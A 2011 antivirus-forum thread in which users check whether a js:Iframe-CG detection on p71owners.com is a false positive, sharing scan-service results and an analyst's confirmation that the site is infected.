False Positive -

system · October 17, 2011, 10:40pm

Hello everyone:

I would like to report a false positive trojen at the following site: p71owners.c0m <(obviously the 0 is supposed to be a o)

Infection Details
URL: hXXp://www.p71owners.com/css.php?styleid
Infection: js:Iframe-CG [Trj]

Please Fix this. Its on every page I visit on the site.

Wanted to add AVG MSE, McAfee, dont report the site.
If It is infected, can someone tell me what I need to tell the webmaster? Hes a very active user of the forums.

Pondus · October 17, 2011, 10:44pm

INFECTED

VirusTotal - URL scan - p71owners.com/css.php?styleid
http://www.virustotal.com/url-scan/report.html?id=44cb866e2383093aba6da08b39771038-1318883496

VirusTotal - downloaded file scan - p71owners.com/css.php?styleid
http://www.virustotal.com/file-scan/report.html?id=f136f88051845756239294b979b86f64caf05cfceed8eeedfa40eb8e587199db-1318891047

jsunpack say SUSPICIOUS

Wepawet
http://wepawet.iseclab.org/view.php?hash=9be21681712d439a15837e6f826d1194&t=1318891542&type=js

Pondus · October 17, 2011, 10:54pm

If It is infected, can someone tell me what I need to tell the webmaster? Hes a very active user of the forums.

give him the link to this topic...

DavidR · October 17, 2011, 11:18pm

Nothing found at http://sitecheck.sucuri.net/scanner/ for the site, image1.

Checked this one hXXp://www.p71owners.com/css.php out at jsunpach, see image2 of what it considers suspicious, looks nondescript to me.

This is the .js file is considers suspect hXXp://www.p71owners.com/clientscript/vbulletin-core.js, but virustotal is 0/43 VirusTotal results.

Sirmer · October 18, 2011, 8:49am

Hello,
this detection is a correct.

DavidR · October 18, 2011, 12:55pm

Can you expand a little more on this detection, is this a PHP vulnerability being exploited, etc.

EDIT: I see that VT now lots of detections on this css.php file, rather a file purporting to be css, but just running a script tag, VirusTotal Results page

polonus · October 18, 2011, 5:23pm

Hi DavidR,

The exploit is abusing insufficient input validation of the parameter js_frame. Fully being described here: http://securitate.md/blog/phpmyadmin-3-4-5-full-path-discosure/2011/10/17/
There is also a fix given in that article.
Link-source: securitate.md/blog/ article author and detection by Mihail Ursu,

polonus

DavidR · October 18, 2011, 6:01pm

Not entirely sure if that is the same as the file name mentioned is phpmyadmin.css.php not css.php, unless that is just a path issue.

False Positive -

Announcements